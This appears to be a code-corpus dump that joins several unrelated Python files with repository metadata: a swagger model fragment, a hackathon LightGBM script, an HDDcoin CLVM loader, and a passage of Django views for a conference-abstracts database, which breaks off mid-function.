six.iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(Body19, dict): for key, value in self.items(): result[key] = value return result def to_str(self): return pprint.pformat(self.to_dict()) def __repr__(self): return self.to_str() def __eq__(self, other): if not isinstance(other, Body19): return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other
true
true
f705e8c12e46c20739a33fd39e478184c2fdb15c
4,875
py
Python
sigma_script.py
bettybhzhou/EasyMarkit_AI
028824a0af246d232013246bf1784013921beec3
[ "MIT" ]
2
2019-04-13T23:31:10.000Z
2019-04-14T00:45:43.000Z
sigma_script.py
pak-alex/EasyMarkit_AI
028824a0af246d232013246bf1784013921beec3
[ "MIT" ]
null
null
null
sigma_script.py
pak-alex/EasyMarkit_AI
028824a0af246d232013246bf1784013921beec3
[ "MIT" ]
3
2019-04-13T23:31:16.000Z
2019-04-20T01:30:54.000Z
""" Winning Python script for EasyMarkit Hackathon by Team Sigma """ ##Team Sigma - Members: Betty Zhou, Bailey Lei, Alex Pak # Usage: python sigma_script.py data/train.csv data/test.csv # import any necessary packages here #loading libraries import argparse import os import pandas as pd import numpy as np import sklearn from sklearn.model_selection import train_test_split import lightgbm as lgb # read in command line arguments parser = argparse.ArgumentParser() parser.add_argument("train_file_path") #path of training set parser.add_argument("test_file_path") #path of test set args = parser.parse_args() def onehot_drop(df, column_name): for index in column_name: one_hot = pd.get_dummies(df[index], prefix = index) df = df.drop(index,axis = 1) df = df.join(one_hot) return df def fit_train(df): train_df = df train_clean = onehot_drop(train_df, ['type', 'province']) train_clean['cli_area'] = train_clean['cli_area'].map({'Urban':1, 'Rural':0}) train_clean['pat_area'] = train_clean['pat_area'].map({'Urban':1, 'Rural':0}) train_clean['gender'] = train_clean['gender'].map({'M':1, 'F':0}) # convert to datetime train_clean['apt_date'] = pd.to_datetime(train_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) train_clean['sent_time'] = pd.to_datetime(train_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) train_clean['send_time'] = pd.to_datetime(train_df.send_time, format='%H:%M:%S', utc =True).dt.time # find time between reminder and appointment train_clean['sent_to_apt'] = (train_clean['apt_date'] - train_clean['sent_time']).dt.total_seconds()/3600 # attributes train_clean['apt_month'] = train_clean['apt_date'].dt.month train_clean['sent_day_of_week'] = train_clean['sent_time'].dt.day_name() # one-hot encoding train_clean = onehot_drop(train_clean, ['sent_day_of_week']) X = train_clean.iloc[:, 2:] y = train_clean.iloc[:,1] X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, random_state=1) X_train_drop = X_train.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) X_test_drop = X_test.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of training examples:", len(y_train)) print("Number of test examples:", len(y_test)) lg = lgb.LGBMClassifier(silent=False, n_estimators = 2000, max_depth=100) lg_model = lg.fit(X_train_drop, y_train) print("train accuracy: ", lg.score(X_train_drop, y_train)) print("test accuracy: ", lg.score(X_test_drop, y_test)) return lg_model def predict_test(test_df, lg_model): test_clean = onehot_drop(test_df, ['type', 'province']) test_clean['cli_area'] = test_clean['cli_area'].map({'Urban':1, 'Rural':0}) test_clean['pat_area'] = test_clean['pat_area'].map({'Urban':1, 'Rural':0}) test_clean['gender'] = test_clean['gender'].map({'M':1, 'F':0}) # convert to datetime test_clean['apt_date'] = pd.to_datetime(test_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) test_clean['sent_time'] = pd.to_datetime(test_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) test_clean['send_time'] = pd.to_datetime(test_df.send_time, format='%H:%M:%S', utc =True).dt.time # find time between reminder and appointment test_clean['sent_to_apt'] = (test_clean['apt_date'] - test_clean['sent_time']).dt.total_seconds()/3600 # attributes test_clean['apt_month'] = test_clean['apt_date'].dt.month test_clean['sent_day_of_week'] = test_clean['sent_time'].dt.day_name() # one-hot encoding test_clean = onehot_drop(test_clean, ['sent_day_of_week']) test_clean_month = onehot_drop(test_clean, ['apt_month']) test_final = test_clean.iloc[:, 1:] test_final = test_final.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of test examples:", len(test_df)) print("Number of final cleaned test examples:", len(test_final)) print("test data shape: ", test_final.shape) test_clean["response"] = lg_model.predict(test_final) df = test_clean[["ReminderId","response"]] return df def write_to_csv(df): group_name = "sigma" df.to_csv(group_name + "_output.csv", index=False) print(group_name + "_output.csv output successful") def main(): # loading train and test data train_df = pd.read_csv(args.train_file_path) test_df = pd.read_csv(args.test_file_path) # pre-processing input train and test data for training model lg_model = fit_train(train_df) #predict and write to new CSV for submission df = predict_test(test_df, lg_model) write_to_csv(df) if __name__ == "__main__": main()
38.385827
145
0.690051
port numpy as np import sklearn from sklearn.model_selection import train_test_split import lightgbm as lgb parser = argparse.ArgumentParser() parser.add_argument("train_file_path") parser.add_argument("test_file_path") args = parser.parse_args() def onehot_drop(df, column_name): for index in column_name: one_hot = pd.get_dummies(df[index], prefix = index) df = df.drop(index,axis = 1) df = df.join(one_hot) return df def fit_train(df): train_df = df train_clean = onehot_drop(train_df, ['type', 'province']) train_clean['cli_area'] = train_clean['cli_area'].map({'Urban':1, 'Rural':0}) train_clean['pat_area'] = train_clean['pat_area'].map({'Urban':1, 'Rural':0}) train_clean['gender'] = train_clean['gender'].map({'M':1, 'F':0}) train_clean['apt_date'] = pd.to_datetime(train_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) train_clean['sent_time'] = pd.to_datetime(train_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) train_clean['send_time'] = pd.to_datetime(train_df.send_time, format='%H:%M:%S', utc =True).dt.time train_clean['sent_to_apt'] = (train_clean['apt_date'] - train_clean['sent_time']).dt.total_seconds()/3600 train_clean['apt_month'] = train_clean['apt_date'].dt.month train_clean['sent_day_of_week'] = train_clean['sent_time'].dt.day_name() train_clean = onehot_drop(train_clean, ['sent_day_of_week']) X = train_clean.iloc[:, 2:] y = train_clean.iloc[:,1] X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, random_state=1) X_train_drop = X_train.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) X_test_drop = X_test.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of training examples:", len(y_train)) print("Number of test examples:", len(y_test)) lg = lgb.LGBMClassifier(silent=False, n_estimators = 2000, max_depth=100) lg_model = lg.fit(X_train_drop, y_train) print("train accuracy: ", lg.score(X_train_drop, y_train)) print("test accuracy: ", lg.score(X_test_drop, y_test)) return lg_model def predict_test(test_df, lg_model): test_clean = onehot_drop(test_df, ['type', 'province']) test_clean['cli_area'] = test_clean['cli_area'].map({'Urban':1, 'Rural':0}) test_clean['pat_area'] = test_clean['pat_area'].map({'Urban':1, 'Rural':0}) test_clean['gender'] = test_clean['gender'].map({'M':1, 'F':0}) test_clean['apt_date'] = pd.to_datetime(test_df.apt_date,format='%Y-%m-%d %H:%M:%S', utc =True) test_clean['sent_time'] = pd.to_datetime(test_df.sent_time,format='%Y-%m-%d %H:%M', utc =True) test_clean['send_time'] = pd.to_datetime(test_df.send_time, format='%H:%M:%S', utc =True).dt.time test_clean['sent_to_apt'] = (test_clean['apt_date'] - test_clean['sent_time']).dt.total_seconds()/3600 test_clean['apt_month'] = test_clean['apt_date'].dt.month test_clean['sent_day_of_week'] = test_clean['sent_time'].dt.day_name() test_clean = onehot_drop(test_clean, ['sent_day_of_week']) test_clean_month = onehot_drop(test_clean, ['apt_month']) test_final = test_clean.iloc[:, 1:] test_final = test_final.drop(["apt_type", "apt_date", "sent_time", "send_time", "city", "cli_zip", 'pat_id', 'family_id','clinic'], axis = 1) print("Number of test examples:", len(test_df)) print("Number of final cleaned test examples:", len(test_final)) print("test data shape: ", test_final.shape) test_clean["response"] = lg_model.predict(test_final) df = test_clean[["ReminderId","response"]] return df def write_to_csv(df): group_name = "sigma" df.to_csv(group_name + "_output.csv", index=False) print(group_name + "_output.csv output successful") def main(): train_df = pd.read_csv(args.train_file_path) test_df = pd.read_csv(args.test_file_path) lg_model = fit_train(train_df) df = predict_test(test_df, lg_model) write_to_csv(df) if __name__ == "__main__": main()
true
true
f705e901b5b26c21aca2813bb5122e2cd9fef07b
1,541
py
Python
hddcoin/wallet/puzzles/load_clvm.py
JakubSido/hddcoin-blockchain
7b9da03edee3512295c0f142c07c4759512ccbca
[ "Apache-2.0" ]
null
null
null
hddcoin/wallet/puzzles/load_clvm.py
JakubSido/hddcoin-blockchain
7b9da03edee3512295c0f142c07c4759512ccbca
[ "Apache-2.0" ]
null
null
null
hddcoin/wallet/puzzles/load_clvm.py
JakubSido/hddcoin-blockchain
7b9da03edee3512295c0f142c07c4759512ccbca
[ "Apache-2.0" ]
null
null
null
import pathlib import pkg_resources from clvm_tools.clvmc import compile_clvm from hddcoin.types.blockchain_format.program import Program, SerializedProgram def load_serialized_clvm(clvm_filename, package_or_requirement=__name__) -> SerializedProgram: """ This function takes a .clvm file in the given package and compiles it to a .clvm.hex file if the .hex file is missing or older than the .clvm file, then returns the contents of the .hex file as a `Program`. clvm_filename: file name package_or_requirement: usually `__name__` if the clvm file is in the same package """ hex_filename = f"{clvm_filename}.hex" try: if pkg_resources.resource_exists(package_or_requirement, clvm_filename): full_path = pathlib.Path(pkg_resources.resource_filename(package_or_requirement, clvm_filename)) output = full_path.parent / hex_filename compile_clvm(full_path, output, search_paths=[full_path.parent]) except NotImplementedError: # pyinstaller doesn't support `pkg_resources.resource_exists` # so we just fall through to loading the hex clvm pass clvm_hex = pkg_resources.resource_string(package_or_requirement, hex_filename).decode("utf8") clvm_blob = bytes.fromhex(clvm_hex) return SerializedProgram.from_bytes(clvm_blob) def load_clvm(clvm_filename, package_or_requirement=__name__) -> Program: return Program.from_bytes(bytes(load_serialized_clvm(clvm_filename, package_or_requirement=package_or_requirement)))
40.552632
120
0.761843
import pathlib import pkg_resources from clvm_tools.clvmc import compile_clvm from hddcoin.types.blockchain_format.program import Program, SerializedProgram def load_serialized_clvm(clvm_filename, package_or_requirement=__name__) -> SerializedProgram: hex_filename = f"{clvm_filename}.hex" try: if pkg_resources.resource_exists(package_or_requirement, clvm_filename): full_path = pathlib.Path(pkg_resources.resource_filename(package_or_requirement, clvm_filename)) output = full_path.parent / hex_filename compile_clvm(full_path, output, search_paths=[full_path.parent]) except NotImplementedError: # so we just fall through to loading the hex clvm pass clvm_hex = pkg_resources.resource_string(package_or_requirement, hex_filename).decode("utf8") clvm_blob = bytes.fromhex(clvm_hex) return SerializedProgram.from_bytes(clvm_blob) def load_clvm(clvm_filename, package_or_requirement=__name__) -> Program: return Program.from_bytes(bytes(load_serialized_clvm(clvm_filename, package_or_requirement=package_or_requirement)))
true
true
f705e9a1b90c904ee70c6e8914a78070d0f5ea06
101,873
py
Python
dh_abstracts/app/abstracts/views.py
cmu-lib/dhweb_app
dcfc94b8df67e2a17c882b432fdeb52cfd98bf16
[ "MIT" ]
3
2021-05-07T17:01:33.000Z
2022-01-08T07:54:22.000Z
dh_abstracts/app/abstracts/views.py
cmu-lib/dhweb_app
dcfc94b8df67e2a17c882b432fdeb52cfd98bf16
[ "MIT" ]
336
2019-12-04T23:06:08.000Z
2022-03-31T16:23:15.000Z
dh_abstracts/app/abstracts/views.py
cmu-lib/dhweb_app
dcfc94b8df67e2a17c882b432fdeb52cfd98bf16
[ "MIT" ]
null
null
null
from django.shortcuts import render from django.http import HttpResponse, JsonResponse, StreamingHttpResponse, FileResponse from django.template import loader from django.shortcuts import get_object_or_404, render, redirect from django.views import View from django.views.generic import DetailView, ListView from django.db.models import ( Count, Max, Min, Q, F, Prefetch, Subquery, OuterRef, ExpressionWrapper, FloatField, BooleanField, ) from django.db.models.functions import Concat, FirstValue, Cast from django.core import management from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator from django.db.models.functions import Coalesce from django.contrib.postgres.search import SearchRank, SearchQuery from django.contrib.postgres.aggregates import StringAgg from django.urls import reverse, reverse_lazy from django.contrib import messages from django.contrib.messages.views import SuccessMessageMixin from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin from django.contrib.auth.decorators import login_required, user_passes_test from dal.autocomplete import Select2QuerySetView from django.views.generic.edit import CreateView, DeleteView, UpdateView from django.db import transaction, IntegrityError from django.forms.models import model_to_dict from django.forms import formset_factory, inlineformset_factory, modelformset_factory from django.conf import settings from django.utils.html import format_html from django.views.decorators.cache import cache_page import glob from os.path import basename, getmtime from datetime import datetime import csv import sys from operator import attrgetter from tempfile import NamedTemporaryFile, TemporaryDirectory import zipfile from . import models from .models import ( Work, WorkType, Author, Conference, Institution, Appellation, Affiliation, ConferenceSeries, SeriesMembership, Organizer, Country, Keyword, Topic, Language, CountryLabel, Authorship, License, ) from .forms import ( WorkFilter, AuthorFilter, AuthorMergeForm, WorkForm, WorkAuthorshipForm, FullInstitutionForm, InstitutionMergeForm, AffiliationEditForm, AffiliationMergeForm, KeywordMergeForm, TagForm, TopicMergeForm, AffiliationMultiMergeForm, KeywordMultiMergeForm, ConferenceForm, ConferenceCheckoutForm, ConferenceSeriesInline, LanguageMergeForm, WorkTypeMergeForm, InstitutionMultiMergeForm, TopicMultiMergeForm, ConferenceXMLUploadForm, ) PERMISSIONS_ERROR_TEXT = ( "Please contact the lead project editors to edit this part of the database." ) def cache_for_anon(func): """ On these views, call the cache if the user is not authenticated """ def wrap(request, *args, **kwargs): if request.user.is_authenticated: return func(request, *args, **kwargs) else: return cache_page(settings.CACHES["default"]["TIMEOUT"])(func)( request, *args, **kwargs ) return wrap def user_is_staff(func): def wrap(request, *args, **kwargs): if not request.user.is_authenticated: return redirect(f"{reverse('login')}?next={request.path}") if request.user.is_staff: return func(request, *args, **kwargs) else: messages.warning(request, PERMISSIONS_ERROR_TEXT) return redirect("home_view") return wrap class StaffRequiredMixin: def dispatch(self, *args, **kwargs): if not self.request.user.is_authenticated: return redirect(f"{reverse('login')}?next={self.request.path}") if self.request.user.is_staff: return super().dispatch(*args, **kwargs) else: messages.warning(self.request, PERMISSIONS_ERROR_TEXT) return redirect("home_view") class ItemLabelAutocomplete(Select2QuerySetView): def get_selected_result_label(self, item): return self.get_result_label(item) class WorkAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Work.objects.all() parents_only = self.forwarded.get("parents_only", None) if parents_only: qs = qs.filter(work_type__is_parent=True) conference = self.forwarded.get("conference", None) if conference: qs = qs.filter(conference=conference) if self.q: qs = qs.filter(title__icontains=self.q) return qs.all() class AppellationAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Appellation.objects.all() if self.q: qs = qs.filter( Q(first_name__icontains=self.q) | Q(last_name__icontains=self.q) ).all() return qs class KeywordAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Keyword.objects.annotate(n_works=Count("works")).order_by("-n_works") if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class LanguageAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Language.objects.annotate(n_works=Count("works")).order_by( "-n_works", "title" ) if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class TopicAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Topic.objects.annotate(n_works=Count("works")).order_by("-n_works") if self.q: qs = qs.filter(title__icontains=self.q).all() return qs def get_result_label(self, item): return f"{item} ({item.n_works} works)" class CountryAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Country.objects.annotate( n_works=Count( "institutions__affiliations__asserted_by__work", distinct=True ) ).order_by("-n_works") if self.q: qs = qs.filter( Q(pref_name__icontains=self.q) | Q(names__name__icontains=self.q) ) return qs.distinct() def get_result_label(self, item): return f"{item} ({item.n_works} works)" class InstitutionAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = ( Institution.objects.annotate( n_works=Count("affiliations__asserted_by__work", distinct=True) ) .select_related("country") .order_by("-n_works") ) if self.q: qs = qs.filter(name__icontains=self.q).all() return qs def get_result_label(self, item): if item.country is not None: c_label = item.country.pref_name else: c_label = "" location_statement = ", ".join( [l for l in [item.state_province_region, c_label] if l != ""] ) return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>" class AffiliationAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = ( Affiliation.objects.annotate( n_works=Count("asserted_by__work", distinct=True) ) .select_related("institution", "institution__country") .order_by("-n_works") ) inst_filter = self.forwarded.get("institution", None) if inst_filter: qs = qs.filter(institution=inst_filter) if self.q: qs = qs.filter( Q(department__icontains=self.q) | Q(institution__name__icontains=self.q) ).distinct() return qs def get_result_label(self, item): if item.institution.country is not None: c_label = item.institution.country.pref_name else: c_label = "" location_statement = ", ".join( [l for l in [item.institution.state_province_region, c_label] if l != ""] ) return f"{item} ({item.n_works} works)<br><small text-class='muted'>{location_statement}</small>" class ConferenceAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Conference.objects.annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ) ).order_by("year", "main_series", "short_title", "theme_title") if self.q: qs = qs.filter(search_text__icontains=self.q).distinct() return qs def get_result_label(self, item): if item.main_series: return f"{item.main_series} - {item.year} - {item.short_title}" elif item.short_title: return f"{item.year} - {item.short_title}" else: return f"{item.year} - {item.theme_title}" class AuthorAutocomplete(ItemLabelAutocomplete): raise_exception = True def get_queryset(self): qs = Author.objects.annotate( n_works=Count("authorships", distinct=True), main_last_name=Max("appellations__last_name"), main_first_name=Max("appellations__first_name"), ).order_by("main_last_name", "main_first_name", "-n_works") if self.q: qs = qs.filter(appellations_index__icontains=self.q).distinct() return qs def get_result_label(self, item): return format_html( f"{item.most_recent_appellation} ({item.n_works} works)<br><small text-class='muted'>(All names: {item.appellations_index})</small>" ) def work_view(request, work_id): related_conference = Conference.objects.annotate( n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True ), ).prefetch_related("series", "organizers") work = get_object_or_404( Work.objects.select_related("work_type", "full_text_license").prefetch_related( Prefetch("conference", queryset=related_conference), "keywords", "topics", "languages", Prefetch( "session_papers", queryset=Work.objects.prefetch_related( Prefetch( "authorships", queryset=Authorship.objects.select_related("appellation"), ), ), ), Prefetch( "parent_session", queryset=Work.objects.prefetch_related( Prefetch( "authorships", queryset=Authorship.objects.select_related( "author", "appellation" ), ) ), ), ), pk=work_id, ) authorships = ( Authorship.objects.filter(work_id=work_id) .order_by("authorship_order") .distinct() .select_related("work", "author", "appellation") .prefetch_related( Prefetch( "affiliations", queryset=Affiliation.objects.select_related( "institution", "institution__country" ), ) ) ) context = {"work": work, "authorships": authorships} return render(request, "work_detail.html", context) def author_view(request, author_id): author = get_object_or_404(Author, pk=author_id) sorted_authorships = ( Authorship.objects.filter(author=author) .order_by("work__conference__year") .prefetch_related( Prefetch("work", queryset=Work.objects.select_related("conference")) ) ) appellations = ( Appellation.objects.filter(asserted_by__author=author) .distinct() .annotate(latest_year=Max("asserted_by__work__conference__year")) .order_by("-latest_year") .prefetch_related(Prefetch("asserted_by", queryset=sorted_authorships)) ) affiliations = ( Affiliation.objects.filter(asserted_by__author=author) .distinct() .annotate(latest_year=Max("asserted_by__work__conference__year")) .order_by("-latest_year") .prefetch_related( Prefetch("asserted_by", queryset=sorted_authorships), Prefetch( "institution", queryset=Institution.objects.select_related("country") ), ) ) works = ( Work.objects.filter(authorships__author=author) .order_by("conference__year") .distinct() .select_related("conference", "parent_session", "work_type") .prefetch_related( Prefetch( "conference", queryset=Conference.objects.prefetch_related("series", "organizers"), ), "session_papers", "keywords", "topics", "languages", Prefetch( "authorships", queryset=Authorship.objects.select_related("appellation", "author"), ), ) ) author_admin_page = reverse("admin:abstracts_author_change", args=(author.pk,)) context = { "author": author, "works": works, "appellations": appellations, "affiliations": affiliations, "author_admin_page": author_admin_page, } return render(request, "author_detail.html", context) class AuthorSplit(DetailView, StaffRequiredMixin): model = Author template_name = "author_split.html" context_object_name = "original_author" def get_context_data(self, **kwargs): authorships = Authorship.objects.filter(author=self.get_object()).order_by( "work__conference__year" ) return {self.context_object_name: self.get_object(), "authorships": authorships} @transaction.atomic def post(self, request, *args, **kwargs): """ Create new author and transfer authorships """ authorships_to_move = request.POST.getlist("splitselect") try: new_author = Author.objects.create() Authorship.objects.filter(id__in=authorships_to_move).update( author=new_author ) # Force-update appellations self.get_object().save() new_author.save() messages.success( request, f"{len(authorships_to_move)} authorships moved to new author id {new_author.id}", ) return redirect("author_detail", new_author.id) except: messages.error(request, str(authorships_to_move)) return redirect("author_split", self.get_object().id) class XMLView(DetailView, LoginRequiredMixin): model = Work context_object_name = "work" def get(self, request, *args, **kwargs): response = HttpResponse(self.get_object().full_text, content_type="xhtml+xml") response[ "Content-Disposition" ] = f"attachment; filename={self.get_object().id}.xml" return response class AuthorList(ListView): context_object_name = "author_list" template_name = "author_list.html" paginate_by = 50 def get_queryset(self): base_result_set = Author.objects.exclude(appellations__isnull=True).annotate( n_conferences=Count("works__conference", distinct=True) ) raw_filter_form = AuthorFilter(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data order_res = filter_form["ordering"] if order_res is None or order_res == "": order_res = "last_name" result_set = base_result_set.annotate( last_name=Max("appellations__last_name"), n_works=Count("authorships", distinct=True), ).order_by(order_res) author_res = filter_form["author"] if author_res is not None: result_set = result_set.filter(id=author_res.id) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter( authorships__affiliations=affiliation_res ) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter( authorships__affiliations__institution=institution_res ) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter( authorships__affiliations__institution__country=country_res ) conference_res = filter_form["conference"] if conference_res is not None: result_set = result_set.filter(works__conference=conference_res) if filter_form["singleton"]: result_set = result_set.filter(n_conferences=1) name_res = filter_form["name"] if name_res != "": result_set = result_set.filter(appellations_index__icontains=name_res) first_name_res = filter_form["first_name"] if first_name_res != "": result_set = result_set.filter( authorships__appellation__first_name__icontains=first_name_res ) last_name_res = filter_form["last_name"] if last_name_res != "": result_set = result_set.filter( authorships__appellation__last_name__icontains=last_name_res ) # Newest affiliations newest_authorship = Authorship.objects.filter( author=OuterRef("pk") ).order_by("-work__conference__year") annotated_authors = result_set.annotate( main_affiliation_department=Subquery( newest_authorship.values("affiliations__department")[:1] ), main_affiliation_institution=Subquery( newest_authorship.values("affiliations__institution__name")[:1] ), main_affiliation_institution_city=Subquery( newest_authorship.values("affiliations__institution__city")[:1] ), main_affiliation_institution_state=Subquery( newest_authorship.values( "affiliations__institution__state_province_region" )[:1] ), main_affiliation_institution_country=Subquery( newest_authorship.values( "affiliations__institution__country__pref_name" )[:1] ), most_recent_first_name=Subquery( newest_authorship.values("appellation__first_name")[:1] ), most_recent_last_name=Subquery( newest_authorship.values("appellation__last_name")[:1] ), n_works=Count("authorships", distinct=True), ) return annotated_authors else: messages.warning( self.request, "Query parameters not recognized. Check your URL and try again.", ) return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["author_filter_form"] = AuthorFilter(data=self.request.GET) context["available_authors_count"] = Author.objects.count() context["redirect_url"] = reverse("author_list") return context def annotate_multiple_series(qs): return qs.annotate( n_conferences=Count("conferences", distinct=True), earliest_year=Min("conferences__year"), latest_year=Max("conferences__year"), n_complete=Count( "conferences", filter=Q(conferences__entry_status="c"), distinct=True ), n_in_progress=Count( "conferences", filter=Q(conferences__entry_status="i"), distinct=True ), n_in_review=Count( "conferences", filter=Q(conferences__entry_status="r"), distinct=True ), n_remaining=F("n_conferences") - F("n_complete") - F("n_in_progress") - F("n_in_review"), pct_complete=( Cast(F("n_complete"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_in_progress=( Cast(F("n_in_progress"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_in_review=( Cast(F("n_in_review"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, pct_remaining=( Cast(F("n_remaining"), FloatField()) / Cast(F("n_conferences"), FloatField()) ) * 100, ).order_by("title") def annotate_single_series(qs): res = qs.aggregate( earliest_year=Min("year"), latest_year=Max("year"), n_conferences=Count("id", distinct=True), n_complete=Count("id", filter=Q(entry_status="c"), distinct=True), n_in_progress=Count("id", filter=Q(entry_status="i"), distinct=True), n_in_review=Count("id", filter=Q(entry_status="r"), distinct=True), ) res["n_remaining"] = ( res["n_conferences"] - res["n_complete"] - res["n_in_progress"] - res["n_in_review"] ) if res["n_conferences"] > 0: res["pct_complete"] = (res["n_complete"] / res["n_conferences"]) * 100 res["pct_in_progress"] = (res["n_in_progress"] / res["n_conferences"]) * 100 res["pct_in_review"] = (res["n_in_review"] / res["n_conferences"]) * 100 res["pct_remaining"] = (res["n_remaining"] / res["n_conferences"]) * 100 else: res["pct_complete"] = 0 res["pct_in_progress"] = 0 res["pct_in_review"] = 0 res["pct_remaining"] = 0 return res def conference_series_qs(): return annotate_multiple_series( ConferenceSeries.objects.exclude(conferences__isnull=True) ) class ConferenceSeriesList(ListView): context_object_name = "series_list" template_name = "conference_series_list.html" def get_queryset(self): base_result_set = conference_series_qs() return base_result_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) sa_conf = Conference.objects.filter(series__isnull=True) context["standalone_conferences"] = annotate_single_series(sa_conf) context["standalone_conference_count"] = sa_conf.count() return context class ConferenceSeriesDetail(DetailView): model = ConferenceSeries template_name = "conference_series_detail.html" context_object_name = "series" def get_member_conferences(self): return Conference.objects.filter(series_memberships__series=self.get_object()) def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["series_progress"] = annotate_single_series( self.get_member_conferences() ) series_order_subquery = SeriesMembership.objects.filter( conference=OuterRef("pk"), series=self.get_object() ).order_by("number") context["conference_list"] = ( self.get_member_conferences() .annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), series_order=Subquery(series_order_subquery.values("number")[:1]), ) .order_by("series_order") .prefetch_related( "series_memberships", "series_memberships__series", "organizers", "country", "hosting_institutions", "hosting_institutions__country", "documents", ) ) context["series_list"] = conference_series_qs() return context class StandaloneList(View): template_name = "conference_series_detail.html" def get_standalone_list(self): qs = ( Conference.objects.filter(series__isnull=True) .annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), ) .order_by("year", "short_title", "theme_title") .prefetch_related( "series_memberships", "series_memberships__series", "organizers", "country", "hosting_institutions", "hosting_institutions__country", "documents", ) ) return qs def get(self, request): faux_series = { "title": "Standalone Events", "notes": "Digital humanities events not belonging to a larger series, such symposia or workshops.", "n_conferences": self.get_standalone_list().count(), } context = { "conference_list": self.get_standalone_list(), "series": faux_series, "series_list": conference_series_qs(), "series_progress": annotate_single_series(self.get_standalone_list()), } return render(request, self.template_name, context) def home_view(request): conference_count = Conference.objects.count() years_count = Conference.objects.aggregate(year_range=Max("year") - Min("year"))[ "year_range" ] work_count = Work.objects.count() author_count = Author.objects.exclude(authorships__work__isnull=True).count() institution_count = Institution.objects.count() country_count = ( Country.objects.filter( Q(institutions__affiliations__asserted_by__work__isnull=False) | Q(institutions__conferences__isnull=False) | Q(conferences__isnull=False) ) .distinct() .count() ) context = { "site": { "conference_count": conference_count, "years_count": years_count, "work_count": work_count, "author_count": author_count, "institution_count": institution_count, "country_count": country_count, } } return render(request, "index.html", context) @user_is_staff @transaction.atomic def author_merge_view(request, author_id): author = get_object_or_404(Author, pk=author_id) if request.method == "GET": """ Initial load of the merge form displays all the authorships of the current author that will be affected """ context = {"merging": author, "author_merge_form": AuthorMergeForm} return render(request, "author_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = AuthorMergeForm(request.POST) if raw_form.is_valid(): target_author = raw_form.cleaned_data["into"] if author == target_author: """ If the user chooses the existing author, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an author into themselves. Please select a different author.", ) return redirect("author_merge", author_id=author_id) else: old_author_string = str(author) merge_results = author.merge(target_author) target_author.user_last_updated = request.user target_author.save() messages.success( request, f"Author {old_author_string} has been merged into {target_author}, and the old author entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} authorships updated" ) return redirect("author_detail", author_id=target_author.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "author_merge.html", context) def field_required(field): if field.get_internal_type() in ("CharField", "TextField") and field.blank: return False if field.null: return False return True def download_data(request): data_dictionary = [] if request.user.is_authenticated: dt_config = settings.PRIVATE_DATA_TABLE_CONFIG zip_url = reverse("private_all_tables_download") else: dt_config = settings.PUBLIC_DATA_TABLE_CONFIG zip_url = reverse("public_all_tables_download") denormalized_url = reverse("works_download") denormalized_last_updated = 